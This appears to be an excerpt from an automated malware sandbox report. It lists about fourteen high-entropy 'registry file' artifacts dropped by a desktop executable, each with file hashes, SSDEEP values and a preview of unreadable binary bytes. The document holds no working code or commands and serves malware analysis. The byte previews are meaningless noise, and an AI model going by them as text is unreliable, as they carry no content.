              Preview:regf.......z.#..U..R.\..f>.....,H..zS....Z...O...ABr.K}.Q..Eu{.-_..+....1.....0!.1Ha.pA..8y...&.."t.y&..yK.#.A....;r4i...7<p....D....O.[.Q:D..S.B.f..(.KJ..>N.;f9..C.....=.=..p......F.....z....|...cH(..}....R..._.....}.OS?.....i...e.....B...\....J.!.b.rx'.9.XOH.i..fNG...v:].*..W.....B..U.....h...^....Te.|.L....j~fq..l.D...=.?...Q.Y1".......'@L.....%.f.m.......y|s....$.'~B..^?..C8.k.3. ...K.K......7....X...H..Qf........2..YM.}`<.e..1.....D...5..(.a...(q.u.M.Ka.r........Z...:..F|F^.....r..C..y=QWPj.=.V.Z..5U.8..rJ7.c.UI.NR+.G...0.!..:.UJ^jL.i..Qv<.........%.&..~.....1...*w.).v...:..8...B.l?..b.a[..5d..|Xu$..B\Wzh6..O=R..(]E.G..k..u.A.\~?\r.U.Qx..^ .r'..>R?....r......O....W.......>..n..^G._A..<eE....!u.l.sf......`.vk........\....`....3V.z,.x6[$.}...9...+-..M[..i..o...L.Z.>.k..C...V\...l..G.g+..Ta...hD:.KY.f!..;G........=,.j.s..h.9..L..7.....v.i....j..&:_.?y]|...[2.'..,.Z..@.....Wo$.f....{..JZk....s.@T..B.r.Yw.......5?.i.4.....U..9...6.vX....
              Process:C:\Users\user\Desktop\66d5df681876c_file010924.exe
              File Type:MS Windows registry file, NT/2000 or above
              Category:dropped
              Size (bytes):8526
              Entropy (8bit):7.979796602136733
              Encrypted:false
              SSDEEP:192:/XxwegroL601yTjZ+Rz/5frUKmEsxwgP7qmDQHFJ2nDLO/CkZdw2yfqTi:/mpkLVkZ+Rm7NklJ2kCIju
              MD5:03E7C942D75D9FB9F8C8F6F512BC803A
              SHA1:218C59489766B2452B9C0EBA453C77FC44B0303B
              SHA-256:F04C151773329D07E24328946A2B3F6CB58715F416939D0EC7DA2DA8738ECD92
              SHA-512:58944918482B987B1441336F245200C027F9CF680D5A17B80EA0EA3DFCE6F4D22FA39FC8B6A9E83AB316C75E48EAC6A42AD96942B97826C90A812BAC8E9BE62D
              Malicious:false
              Preview:regf...V-........-r.m.-[......&=.L..H..w|...T."3..S.C.....R.Z..j.O..X...eKw..m..(.....>=v....n\k$..h....K).x..{b...,..9.|.aX,...9..Ut..i./?....h..U...b...<..+!.....o... p..`..K........r...N.B..-......N?...gO..un..Jf.t.... ...%l....4..ggHP'....*Q..1.W.xz.e..a.U.S...._t.s..Q.....z.&.,`. ..K......U...._...&.O....@..g..FA_....w..#.C..U.H.....MO.;"..&;.....$....UB.1..]$Ca^..Dp.}F.{/.....q.`d.7.V....];..U/V.IbO.V....c..<.j...._.S...N.....$.Z..y..6..H.'..C..qm..Ws .....8x...:.&E5q.....Y...U.}@...mv..q.s=.. #.\.........x.{.\.s%.?l.o..4.s..../.+....Y..J1..c5....o.*.....-..U..j..2..e.2Zw.I.>}....Xk....H..y*..R..G..-...)..&`.J.5k..a..]V;y.l..?....O.J.Cy.$....rl...R.c...r....%.s.O...NH)......YL..........#.L.9i#........E....._g>S....##..yJBb...]Jx%}".=.T.MK...h.|......b&..QZ.>.&...'....^..)f..k.e./.l(...4.6..i~3S........q..p.e..<..v%.........!.D.o.M...m.?.yz.....d\..B..0..y,....).;-.&....}%..S{...#qh7............i@.X...g... 1_((.CR.j.....7..54.[.daY{..
              Process:C:\Users\user\Desktop\66d5df681876c_file010924.exe
              File Type:MS Windows registry file, NT/2000 or above
              Category:dropped
              Size (bytes):8526
              Entropy (8bit):7.977641968946028
              Encrypted:false
              SSDEEP:192:jtxc+bHzXlfYZknFwTEzx4PB0H+ITIBeHk2sa6ry970G:Xc+bT1fFwwYB0VTow1GG
              MD5:ECB9D035584348C2C0A3BBAE7F725DD5
              SHA1:4A2DAA7CC58476E9AF17E21D3C11B29BE7D58CCD
              SHA-256:C4CA320A088E1846EB22CDB6F672116586DD63B307F7FFB95BF3FC00012BE135
              SHA-512:A0856FEBDDA0722EE536EF90B2EC2BDA71D55D55243A5F6CA2E2D6B550EF693C1B0DD95F756AB83B3479170908505CA8E984B6C7E40D1F12104ADD286BD30969
              Malicious:false
              Preview:regf.=5......l.5.5.[......-[......N...Bp..#y{...........@..x.R..C.....*...-<.. a5W0.....r.;..b..V.._j......\...s.hAf...-.r~c.pm.h.B.b...... [u.E...r..x..K.../.....!..OZ.....iy/k.I.@..5D~......_.m\....u..5..B..N.I...;..F.';.....7.,k.O.3w.#~..y....*...m..1 b..ZX.V.......@.....[R;Q....t. .......xCuH*.Y..k.4;n.nM+.2.Z....PFH....uB...N.kx.y...gXX.s..&A.w2\.,.jb....C......H....kd......h...O.<,kw6.g...tX..5.).T....I......1...BX.........W....6..(..26...Z.S.+..v..!.....<F........f.>.....1.|.P...C6.b..b....8.x.3......g...7N.>..#8p%.4wRYE..i..L....Sx/.['3.t.u.f...@.q........;."..a......c.V\.o.v..0..k..,qdN..@.j9......|.y.3Z..Sh(....>..'7.x.......[....l.{..[q%......e.ws0P..!|.{H.g.[..>B..I.L|<.i.5=i..3.'..(./o.....F.i....<..Db.iDC..W.A....C. ..F..$Jd......Db...>.Kp...XN.!{..\-.}/.....n..y<.8V......~.i..x....:bh.Y..u..4.I.B[....a.....v;WMg~...s..>..>.*SJ.f........1..|.l..i?C......ts.....4hT.X?a[.vN........%.../...40..g...~.0....{.....Q7.
              Process:C:\Users\user\Desktop\66d5df681876c_file010924.exe
              File Type:MS Windows registry file, NT/2000 or above
              Category:dropped
              Size (bytes):8526
              Entropy (8bit):7.976899186523231
              Encrypted:false
              SSDEEP:192:bASFD/nLCE6dKXczIWKUYxrznBWRFrtk6JYPf9Jkj/rG61zzM25w6Nc:EiDn+dzz3Yx3nBWRFrtkzojjvk6Nc
              MD5:CD234DD05A8147AB94291A498033E825
              SHA1:3A5C2C4CD856331E9C51FBC5CA759B8A47B10A27
              SHA-256:EDD4F1EE67D2ED88B297A1F0BAD5BB188D78A56B73C31ACB3D49A8FDFF8F2EF5
              SHA-512:619C08BB01680475E524E01634FFF6921D860D82728611A83F66E0C1F49F9F1F09BA41EAB38731E5BB38A1A1BD0C55D6948133753FF9C338D206895FA7573492
              Malicious:false
              Preview:regf...q ..f.3......|nz...^..S.$.^EsE.....[NW.c......`.1...&B...H.?...l.m.6...]'......H(cr..6X;.t.s.l.....h.o..o.t.nS.r.}}...... ...Dy..Q......k.$..P..w`..l`.....5B.....&......Dnv..J....[.a...L3#..ExR.e.]..y}"...#.DC...-|.D.$.y...."r=.........!aaw..gpV.x'.k..$..h{.&...`..6.&...._Z.=.54&.4.#Q..P..[g...m...z.+..dko......2....w......v5vGJ.Z$x....t.(_.L.hX.<`Y.Ha)..h.#.21..6Y.W4@..D.%|~o.6(.!..k-....],`..TD.VDd.....<5g.g._.C...t.f@'..u..b.Z).d...B..|.......~.-...&..t..h..7.Vm$.*P.....-..V......J.|2g..Q.S.....\....6..\.P...q.._...b..E]A..Io...]"}..(.E...lY.D...d..6z;......q....w..H.R.8+..8..dB'...L.-....../.,....o.C.P.5.w.ln...(=...I*..K...H..{.t....1...~$|..Q..AS.+Q....[c..K).......2.k.S....@.b{...g.\(...:.Jv.}..].-..QT...Iy......J~........*...A..A7p...N..K.U8.d..c....!..w.`...D..h#.N. '..._".f.u.l!|.v...N...m.P..q,.'...^6... C.......0...l.t.mdnA.}...3.V/.z.q.C..>a....._....IV.i..:..O.Is.......>...[..u_...7C..lK.@.\'T.%.d7<.=.K.bB....(.\.#".=..#...
              Process:C:\Users\user\Desktop\66d5df681876c_file010924.exe
              File Type:MS Windows registry file, NT/2000 or above
              Category:dropped
              Size (bytes):8526
              Entropy (8bit):7.979291869908251
              Encrypted:false
              SSDEEP:192:O+cn9gOoJTVwB0sPaInNOBfGkIlKaCueWfwskZyc7FfaGCf0w2bcxL116:O+c9wiBTlnSfbI6nfsCCDGW1U
              MD5:312B3ECF3F1D34F2612D3A63FF8D56E2
              SHA1:FDD105833E5D97527A8D910CECB0D20E14F829DA
              SHA-256:10EFBAF1341BE56CF83FFC97FAA45C51B6268B43945EDFA95F67660D02148F76
              SHA-512:893BE9ED3847B250102FFDB8D13D1FAEC3DB96D305916A93A048E03AA1D88E651FF9C35152272D98F94A325D316A8EA49DE9746DC39E5DFFDF94DAA05F4CB6CD
              Malicious:false
              Preview:regf.....sH...<...YeG..1...HoC...._ ......u.3..m.S.4f.C.]<vM...\.Jy.).7.........#.....U!. S...0W1t.I..1..FR.g.......|.p...r..R.........Z....+Mx..?.w..Of.0..xq.&F..U2......cgO.I....d....B~..._.%..$..u.KjDc!W..wl.x+@.|.G..7jE...........,....!j..r....1..AQW.]KB._..J:"="G..|.2z....A>..u.yD.HS..!...q..fYcv....w..bv.........'........Z..I.2...?..E.#q..BA.1k..DR..X....A..^f...#../.M.wj..`...b...z..v..F.9'..g..@0...}T.....w^.Y...t.../.a.-EU..q...Q&f.W4.....y....6..3.Z.>...Xm.B.."..^............"..oTaC,......c...K...9..$.V...]..x.q..^.3q>y.v@.5.%!.@r.\.....k.....Ec.UN..z.DL.&.....?..O.s.eom...g..o@1...F.J7......u...........8.)..~xX...]".2..|.*..3.A..,.3....g..e...V &.0.^.j.lI..!..g.@r.2@.4.1..g. (..D.C..l.L..{.%.a.g...?.W......"..2+qu}..3w.)..6".;...]d....j.].%]/.y...W.,.K.^..I..k.W.s......u..X~.ps....PV.&5.b]k.03..H3...Q?.kP='?..%]L.n_E.I...MT..^.m_.U..Ue.....-++.&..}.^z...#.X....;.B.K........4..pD...N..v..=....Zx..]....V...I.....`..P....F:W.
              Process:C:\Users\user\Desktop\66d5df681876c_file010924.exe
              File Type:MS Windows registry file, NT/2000 or above
              Category:dropped
              Size (bytes):8526
              Entropy (8bit):7.979836464138886
              Encrypted:false
              SSDEEP:192:7d/VzIxEl+R2UXt7GwImLwyHUj/WGT/KdyUPqip2R+D3GSkeEG7DFxnq2JJa8:5tzMayrXZGlmvHUfbytUk3G/eEG7fq2h
              MD5:161565B1F76C1327A65E5D77FD8B846C
              SHA1:CFEDC03F1ACE0A98AE7FB0D0D1A79D46CB999E78
              SHA-256:936831A0F2889359EDB505C92A77D6CAF4AF7CF8546DB4EE9BAC9E3775AA06E2
              SHA-512:17B66D025A69098F7C1C62A97E5988BC25E156FE7E14D1112DB2BBC7D65B72185F013A14E310552C7CD8B89C6E98793C86225453088266EDB7C5F360889149AC
              Malicious:false
              Preview:regf.S.......Ek.;..."?.IY5....Oc]jQdBea...2.....\.p...T:p]V.O..LC......p!C.(..(..O.{...">.<'.MkC..W`.<0.?...Jd!F<.5...R..<B....:!j.'..$n..L#..,.rG..<+R.......I........x....Q..`#5.K.FQ...[k".@@..p...E<..Rk.G.........t}......o.../]%....C...c..8.X....o%JG...$...-.E..Q.5...M..l./......%......K..]!.......5P}..V...SK1............/.z..}.h..U.p.R.]._.X.....!..f0.%...`..ME../=s9.zH.5!;.Ln.....1J.{6....x..Z...44.}r...`.3..Fo>....Y.F].1......f....3.y.T*...o.oG../.+..(iG+..]...8...]...K...!6....'.|MF.Ig+k...K!.V.._..f..H.G....g0.e.r.s...eW.~=.>...>. .]Q..<.aN.4....}.X..~..:....cC$`....4o.5.u.t...b..~.v......~r..p. ....3.H....l...r....Z.t...9..D.MH...{.N.Pc.....S.w.....J........#..HI[f.H`VD^...u...e..0...j..^OZ.oi...9L...0...........1..t..g......0..d..n..I\p*.9.k....G..,......e~.q..#v~)[T...;.........!..Gk|...mHV|..1.|..i....nZ.q:e...X?.b-....[E#.C3S.{.S......x.....TPx..,z2...K..{....?.^..%qs,....z...&/ph..6..!.S.V.a...U.....zFg...I.%3....O
              Process:C:\Users\user\Desktop\66d5df681876c_file010924.exe
              File Type:MS Windows registry file, NT/2000 or above
              Category:dropped
              Size (bytes):8526
              Entropy (8bit):7.974961138126521
              Encrypted:false
              SSDEEP:192:dl7j4RMwZarVFmEmLeaRVRARTeYKrGN3hEERcxWIc+ATi/qu:8RHZarVF4eyVReeYBixWIcoqu
              MD5:AB45BC4854EAFDCC752F231A636F4616
              SHA1:7CCA60FE13278E965B463A49CCDB9FC85212BEC1
              SHA-256:E02EFCD79530328D1421AD3869583CBC84D99DE468224277AB678964542B1698
              SHA-512:5B42094806D47C630529383D1F0A3E27C86C58460B54A1B62AD07E9E08C43D8C48D2083D72030AF43189FDCE3B57B1C1E6BB4E8F0BA48419F5F5B23FC859D42B
              Malicious:false
              Preview:regf.F...N..)UI..A...D.a.>...#..|..A.?7^E.e...[....].j..*....Y.oZo|3..{w:%\....[.l..&.C..g.G.........X..%.m,.z4...%(...;>n......6..X.<...E.'..=$o.....`...y>5........K....!k}.sS.1.....D..v.=.Y......-..`...%.....m=g...[...XR..3..D..}..JHC.s.>.-F4...LC3...8R;R...ta..l.F....FX...@.SL...y..j.."...h..X..... .s..=6.l..i.Q~iS2..m..r.p.x:..i..Q.0.......9...Oj..C....s.%.e..F....o&..-........mj..........P.x]av.."va..D.u..TP...Ou.Le.&..pGi.L..dx..Q....5.d.5P.R.u...C..F..N%."..x..*...@..C.&.2"...r.'......u.23U:...,..l.x&.....`.#....T.w...k&......U....*X.......f......{..-..}u&y6..W.....U!.T.F.B...q...{A.~M.. /D.{`.....)\i.ceI...)H.....5FCa.....P[..`'.........p0'..{....J.9.?....$...Bu.....b.....=...Q.Y.`.kl.......;mu.....-..j...&SRE..^.W.&.'.m../.K.Y.C.mO.....^.9.e..bj2Y.;.2.=...U.xr?..........gb.A.Y.........:..?.t..k.C..t=..J.x.....7.W#..Teg.9.cm.vCa.}..M...........4.\.a....fuhk0......._.:....oKO.}.v.*7.sH.BS.1.BA...E.U..).!...A.{GkL.SWo.&...2e,..
              Process:C:\Users\user\Desktop\66d5df681876c_file010924.exe
              File Type:MS Windows registry file, NT/2000 or above
              Category:dropped
              Size (bytes):8526
              Entropy (8bit):7.977026868920903
              Encrypted:false
              SSDEEP:192:wbpSLONZOhOcuapBsALhMiK/kXoxWE8hROu0puhcyzAE5tfd9B:KbNUEcuapBZLhMiK/SoxWZQu0puCyFxX
              MD5:4610213B7C336D93ACBBF80A663F94B1
              SHA1:4AE84E838A74306F4B31CD6C757B98982077BAA9
              SHA-256:13299AE5427AD14EF78A9AEB6E4D636C17D7F93B4F348D27FDAC6BEA34EA9E76
              SHA-512:9FAAE30C304550D58FD330F14245F93F40CED2689AE958C48A700740136064FB473C48CE47A32B2E5226BED80ADCDB4169AAC5B942C10567CE306452E2682574
              Malicious:false
              Preview:regf.!Q~.w'....S..G..E..!I...W.......Sx>.KO!.v.:o.M&./.R..'t...K~...#.K/ ..c...3.:6.....N"G...rf...D..,.R.B.3J9..DKAV9...nc).<..v..............d...x.#U..b4.(r..0.&N[.3...!.=U.h.p\.4RMw.r..).k..@'..L9................0 \.m./w3.%.n.N........c..>b...l?x.~&}w..<q.$.<..;..h..z~...vYU0.:}."......7...".7...M...Jx............%.....?.<h[9wp3...)...a.r;.....M.{q...\.....>.../F..K..o"{..*....+q.d.,u=l..{...0..Y..%..v\.12.!..0..z<..0I......V.......-h-..*t..Q......q..."..N..Ho.h...I.i.l*3....p.._.$...tc......2#.k."^p...w=_....!d0...^.c...zUa.=e...&D.Rh...!.Gh.*...........U..Yx..%ln....mA.5...........Qu..h@=.`5..p.)....~.$n..$....v`[e.....K..*....M"..[.....R.....u..z.}..i0i..d..ghL.>.6.#.....g...."..ej.l...%.....DsA.L.OZ.kq..!....).AV....*PK..e.g.}H'....(./1..1..[...j. (8Q..z.......k.,..../8q48.. .0&. ..]...4+.;......)Y....W(..y..r...^D.G...z.f....0.+bn..l.P.S..6..L.]O[...3..jQ.N./.0...g@.......:...U...\.Ws....j.K.:....)..;wz..!.|..?.mo. s(F.T.D..WR
              Process:C:\Users\user\Desktop\66d5df681876c_file010924.exe
              File Type:MS Windows registry file, NT/2000 or above
              Category:dropped
              Size (bytes):8526
              Entropy (8bit):7.978556995776738
              Encrypted:false
              SSDEEP:192:PMHRdCJxVQGGZJtK2YqdHslsmzQcqRD2etmEKrlLXPMjrSfREOhe:PqUVQG5256hMcqdt8rlLcS54
              MD5:20ABA2BB9663A23EA6727BC86E6129A1
              SHA1:D5C9FDC76C5AE48EC9972E3309F3F8EB7C7EC076
              SHA-256:3175F394710EAB505679ACC833C2CCBDE4296954DBE5B5C0EAEA1C51F1EDA861
              SHA-512:6127BD79E0D20F7DD65E8888D7BC706CE87D65857609A55B979F21EBDE00DF8E87900F7AF18DF1468FB361118F7BBD418E392ACB4F1BA6218B44831BA8A49345
              Malicious:false
              Preview:regf..,#L..&T3.J._98&.#"!,.ffw*${.=C..<.d..g-.V._t..Wj.*.cu.|S|.(..[.....<*..z.../6.........n......".j.dd...=.../UH..7...>...'h...d.q....R.f...D.^~L<X5>.ux..P..5.a......../.8.....EhmC..=..:..,Q#*/..$.U...roh...C.%f...h.B...D.........L.L...c=.~:..S.,...fp...PE...m`O..!..o.~.6..hk<....&%RF.........8..X..h(.....B.{(.;..:.M.J..._.$.)$...H...H..:_w.Yk...,.....L..-C...^V.)L...._.z>.?\o..]..7b.|y.m...`z.bk..A.i.sz..Zm1..'..g..is....;{$.8.6..{.]gf#..^.....).A..M.Ee..z.hD..=Z>.......9...~Z.y...F`.>.C...3......\$.......PE.b..lei.y..Z..}...#...$..J\'.)..j..n1...A)..i...$_.T.&.I.Z..k6.y.&...|.R.*.=N.1....#=B....%....~..z...,.W"g.......|.n.....H......:..^......c..6^.}..s$..2.er.....|d.XR...~W......>.d.jL.z..I..".....N..5.Ff._.)A..4!.q........d..=...di@.w.....Y...&q.C.....E..n..s.%.>n..9.H..]..HH}F.z.oH1..!i`8.7...)....g...Ju......i....&...3IV...z...Fz,l....y....B.#...tn.3..$X..n.5,q.......J.#DC.s.0w...-.K...>#.V~..z..y.m...!.....e.}>...#.K4E3YV.R.`}..8
              Process:C:\Users\user\Desktop\66d5df681876c_file010924.exe
              File Type:MS Windows registry file, NT/2000 or above
              Category:dropped
              Size (bytes):8526
              Entropy (8bit):7.977801837448173
              Encrypted:false
              SSDEEP:192:sX5v0ddFNuPcC/UgFWJgg/KtUkEoF2OuUVUkuoKAj:u5v01kPn1cJg6tQ8U2gj
              MD5:8F6D6818827177626F0EC6B766CD92C7
              SHA1:8BAE5D223674C3DD886FEF3FA45C77BA0D04E16E
              SHA-256:123362455CA975228D124FA671B09306C5A6EC8ADEBCFE5D50D7330D7D283547
              SHA-512:71BCAA0FE06AE114FB28374C9647A1BA0DF3906FE03587D775EC424A3C69F4DDBB24D6D51F30B89B1C6C193D4BFE596A20908256BA023E1BA82784ECE3568C33
              Malicious:false
              Preview:regf..;....Wkf...7_$".]2.b...A....0..r1s."...........,`8DbY..2...[#.E......}5...d..W.J.,*..x.1......M..V......`@o.L.O~0...n.R.9..|,.W13ZR3)3...+.......3....k...^.#.(..Z.l..2..S.Bl."...t..!S.L..PQ.k.5.Fd$........tcbl.J.<0T......J..|".u.s.4o2<7..a[;.!...o.V.4(.J.c....Z..zQ.../(.g%.a>..v.{....>=.P}f.....9.d...6_.C..+>=...U...L..-'....4....O4....[....q.+n........!.>.....((.1.5. $.....1Dr.\.....u..{X.'1....;|.....%.]E,A.....@01.o@.v..e.....!....W4..y.iP..|16$q....x.......$.7.......RV.N..u.l..[......uTD..1v~=.y......u.r....xw}......r.|b........}.?km..2.....`.6g.l(....Yt...fui...<....e-............H..^....P>N.=...%`...,\u.]...R/..\.m...z\..z.4.w...I.z)4....!..OG..8..:.N..w..,Hy.T.....h...l.p.)...........9...'.....)2.q.@..2>1.D....W._..M.....5..[.....a:.Q...Y.V....9/[..*..3.K..5.T..6.......n..L.w.&b...x..`..t.Q...C./...h.9.K..]R....wYt...O......x....[S..#m.......ip.^.Gf.U.=.....D..$...tr.'....^.z.:.a.=g.......!F.T}...i....Z.....k..
              Process:C:\Users\user\Desktop\66d5df681876c_file010924.exe
              File Type:MS Windows registry file, NT/2000 or above
              Category:dropped
              Size (bytes):8526
              Entropy (8bit):7.976513321589257
              Encrypted:false
              SSDEEP:192:zeN5AcaLY/Ai/n/bZfw45tgl7fzUW7uqO9C0NEBBPc:c55wY/Ai//bO4fglTz93BBPc
              MD5:3C2566B4CE5956343413693D3A79391B
              SHA1:B5CDB1A198E9387451AE72DAD1754EAD58CF41DE
              SHA-256:3C801AB4421508821CBA9AD0118EBC386A753891F34A15B6B6C90941E22E4FC5
              SHA-512:B66A3489EA21449C9033757B4E5A12FE1A8432B61834EECDA3A9401DB3EA768FAD4F286C26445FB03B8B0D44BFF07376CFDDA57B430E3E5E8B45CFD9E8F97EC7
              Malicious:false
              Preview:regf...`.q.....s..#.-...:......Z...T.B..q."..N.4Wx...-.FBZK..t....KB......grnR.L.(.I.C...wm.....[..#Mq.h.s..u.....S..`.b,k......l...|..h...#...p.t....".ed.k./...BN.".6Sz.SY."...d2>..|.M7.... .p.....N...Z.c.....9......@..q.by..bP.bt...96....,.....~......2..n...N.....w....,....%...iH.u...*....1.3#2b..e[...S...V.."B...{....UL...|[D}....5..a........\M..0_....l<...CR..~...vi..X.S_..|K~..>M..\.>..Q.L.............l8.n.7......<.C..XQ..&....P#..Y.g.=].M...*.. /..._.fTdS.u.,..Z.S.......s..h.....2._..7..e...t..m.Y.G'.'B.....l....K.:...r.].C%.Y.<..g..-.u......t....D....$.l..@%........E..........r.^e..^&..T....P..Cb(v6P.-.".....0.p...tw.D...t&..J..I....hcn.D.t....R.`....!..g..<&.%..5J.........e.m%..v=g..B......../U.~.~..0...Q...%.....P6nu.&.#9/....Z<..).\g.]V..[.9.7....rA.e...J...3$.nV.).E8D.W..k.d.....EJ.?.....[QR.1...y..6..U.6F+h]-.e......y...T8.xK......P~.0}..............c...z..NA.7#.C...:.e...k-..MO`.e.C.......$98q.F)...*.-.9.o...=n....
              Process:C:\Users\user\Desktop\66d5df681876c_file010924.exe
              File Type:MS Windows registry file, NT/2000 or above
              Category:dropped
              Size (bytes):8526
              Entropy (8bit):7.9773505516911305
              Encrypted:false
              SSDEEP:192:3wZW25Hhc87Tu7TiE/tA3H1CuD984I+9vkLUK5pHgb:3sW2Fa8+nJulC88U105pHq
              MD5:1FF1967E17FA6EF4D43E4702F86858F2
              SHA1:DE8B1B56E664D3989C8B16FFC1FFD95B7406CB03
              SHA-256:4B7FF45ED7522BBFCF9B774B4DE1BEE2751ECA502A3D77559B080C750C1999DE
              SHA-512:5786B9415049597C2A3BD0F07C97B10ABA3F73A85AFB3BD3C8AD34A9C09CD06AD5B7A35855B438CE4BC603DE735E97E784B46986552A52E36DEFF07AF42949B4
              Malicious:false
              Preview:regf......\..u..D.a.;...I.>....D$.6..+..d...<._.)L..Di...W..1.<..pP...0.:....w..=.)..Z...w..UK.p..$..l..(v..\...-..IBF?..p|.b..N......Zr$.J..e....&i1.....S).KP%...J.M.MW...Y`...........".D.Z..A..iL>7.Z4.H.+.[k...0'..O.8..i{.N......Q.`.WU.)....&...V............cC...w...v...v..8.H:..Cs.~..T...H5e..r..T.<8....z..Sf.GE...^Q...hK..c..Q.[c...s.|..K.{..)..Y.6>.1..FJ*]...w.....3......<S.#@c3.;,$...r..D ......b.=..?..kwg...C...,..uP......[..4.:3..^kFWn13>...r?f._.Rq...R..=..vO.8{.L.$.....cY?..A*....L....... ..N.....E.......M..5..f0...1+..mS...G0\@......50....)/Z.V.y..G...@.k".. ..h.'f..q....u.X.*...h.i.q.?n{M..A-%.4.L..P.lvJ/...w\G..lr.g....Qqp..R...T......c&...r...w.......w.L6i=...;.m.5?~.k......{...Z.R........^....'o...{).."..,.....S..P~...~.g...I.B....-V.......k..V.......3..{WtA..a4ZL.)a21%.U..f.....JhB.[m..L.C...j.......F....[9...V.......@Xds.i.$....%.$.......i.Fy%./kO..n.~~j..q?.`f..........k.....gH....i.D.9.....%.&..................d.....
              Process:C:\Users\user\Desktop\66d5df681876c_file010924.exe
              File Type:MS Windows registry file, NT/2000 or above
              Category:dropped
              Size (bytes):8526
              Entropy (8bit):7.97709555571066
              Encrypted:false
              SSDEEP:192:AIW/GRCQkqAMLwppslbR0FB1J22zP6+fqRl6Bymqw/KM8:9LCRqAML10Oc6+CMT7/t8
              MD5:4AA0555700679EB1C38AB1E3C0AAC665
              SHA1:44DF48AAA1F2C2123351C8EDF90E983425D8F315
              SHA-256:6F4ABA520C58EA46E5D0BCF92521CA492129C670449EEA1ABF9AE5657A10D3D4
              SHA-512:FF660EE1C63ADE6064284E812C47E6D381A625224F11983DF05678420A191BD49B91968592477494D0C98F86A1CEE6AFD2CE83B1A5C98FE74EF0C997DBC01037
              Malicious:false
              Preview:regf.+....K<.W3!....,...;...'..tT....f~..E..5Q....gc/...j..UbN...Q.Up.....og..L..H.m+8Q.OT.._...=.4n.G....!.X.?e.c.bF!A1`[..'Y.'.|..C..eF....'.y....`..bQ.h.%.p......6...`v..w#..P..t.k..._.C....y..?.tm.7I..S%......r.pw........qO.`.}~a.8.O.R...N.....u_.S.N.......r..%....H.....;.2.._ .c#.....t....3%......-.j..]..#...9*+.}.....a..]Z}"..G...~d.v..u...._.6C.5h.d..;.a...3..$..@ .=.o?.e.j..3.O.n.$.^1_.b._Is..lK......ZvZ0..f.........A#j..A.l..q.n..3...:......$...&1_T......%..**.......q.-......G..\+Lx.cd.....m..xc.mn.ZYx.._`....=..D.[-.t..?..I+.G.....T..6dJG...^..'..a.9w.q.H..M..B...ZX[3Y3....4.5.W.(.=...1....U.Z.f;.u.......O...,..B.........QM..9...k{vO.ZH....u..<.WW...=..1......=o',.....h...R..6.T..z..h)@..L.c.[[..[..~v.,.I....{..m....;.F.WkF.Z...T4.....w.Oc..e...K...d..,W.............2..zB'.&..@..7.rt.C.....#..!.....hn.L..O.kO._..o\.,..R=A....Q..z3...(...aD.qr..i..UgFs.1..y...}7...Q..............q.L..\........X..7.6a..9..jT...
              Process:C:\Users\user\Desktop\66d5df681876c_file010924.exe
              File Type:MS Windows registry file, NT/2000 or above
              Category:dropped
              Size (bytes):8526
              Entropy (8bit):7.977581706290789
              Encrypted:false
              SSDEEP:192:u3l6bnlQtuiy8QDnGQ67SGZRaPjXgohehbw9oz:uKl+PQ7X676jwohf9G
              MD5:DAE53B9D33B9D77C2ED6BD427D8F7089
              SHA1:1AD1E099C7489465CE3E654C3511FB6477EB740C
              SHA-256:7C196BD32A93A142D3A7F17D8735B44CA889205F98F4A25DE7C32C71D79297F0
              SHA-512:060DEC626F30046EF5116AF8E596FB30684901D433740890554F8E24AF34E99E9AE4CE9A493D311D33E5795A4FC3B9EDFADE47A5A9C4A436E7607710724855AC
              Malicious:false
              Preview:regf.....T.....`.p.K..xG.:.4....iRl.....8.K..P...x[.v.7(.[...c.^'&A.....<.....H/.1%)..........+../..l..J._.Q ....L6`....=M..+eI*..%.C...z.......X..'...]..1..).....^.*.&! .B.....\_o.`...L.Y..;.}r]...Rz....7...". 5..*..p.G..(.We.f.....}....-......,?B...0Y..|..=)..V@...q.T.D...#.^....Dx...uN.]\=O..'.sZ..*N|.y..Jv.<E!].Uw....S..H.a.. ..".<....G..z...;9.Y.tvI.y..Iy.,..2.....u........F..P...Y....6.&|....W...%.....Rhsz/.H......i.0.f.#D..62.0.W.v..M...Y.7...-znM)...7......1e.mdX..l.Oig.}<..Y.u...E..aW......1;'.......9..w.9..5=....Z!p........F^.n..x.".3i...B.%..PS.$.....X5.+.T:0y.M.Zw...%.L|.0...Tt.....).'u..fn...+#NJ..B...3.x).......4..h.r..s.....[_(..C..j.......Sf^eCLw...R;ar.QV....._...4.v..<..3&.K...*.J..O.d..h.0....F...lt.........2....[...QN.r.+.......r.y.I...t.b1..9.{D...rX...`.L.........J.;q.h.1..1/].../.#.gyL....=.P...;@.u....kGo.5....../{.~.%..6..8..4P}..'..0......R..c..C+.g......d(......io......?.._.....@...C..>PW-.V..U~E......w.ivl..
              Process:C:\Users\user\Desktop\66d5df681876c_file010924.exe
              File Type:MS Windows registry file, NT/2000 or above
              Category:dropped
              Size (bytes):8526
              Entropy (8bit):7.97602560867562
              Encrypted:false
              SSDEEP:192:N41D63iohj1E+HxaefokGsHqKWLKBiPAAWGPwxEHaw7kShtlwY:NODQPXRae5GsLW2BsA16VwY
              MD5:671097B0D23DCD042503AB9C43F3C55C
              SHA1:F9EECB7A55597B02FD6CA19D8E1F9B337993BCCE
              SHA-256:FB514ED4A553526D13795F248DD1FC57FE9DDDC2DEDB023DDE5887835A1C5AF4
              SHA-512:742820762A7BB4E85FAD8262360579D065D8978D9CB0752489F0443EF5EB9CCCA88D89EB85360E82106240BD162E96268496893424CA3E375E52B9EFE1D14F86
              Malicious:false
              Preview:regf..._...t....g-.{..W=.%....=.p~.......p.......W...s4.!.".....Hb..@..%....lm...t~Dch^..BWFl..^.t.....Ge...>...d6(~.fIS.q^....Q.... ...@r.x..l..J......Q.!.Q....?..s..UK....Ml....d0x.....H...q.^+....D.....re.._c....s....Y=l.......S.D.....`@.`..l2....)....tQL.d.........3\5.c..`.,.-D.&..x...n.+..u.k.......|.7.2X..T.5.W.A\..45...5..=U....}y......V=v...[..n.u.\.T].6_."..WE.Z>q...x.c........<.8......zg...........{...-.....:@.T.s...@...7.,......d.kF...'^.Nq...p..P$..'4....=......6...k.8.Z.E$.n:...m..c...._s>v........fV...G3n.q.0...~.X.5...5..$"dY>....?=Wi..5I.`..J5CtB.B.t..b9.....y...|...|.....bYI....._..E.z....I...Y.%....P..z...w.kA.=H'..H.e...j_'Y......-5"....~.."....h..1.*l..0M..;.....0 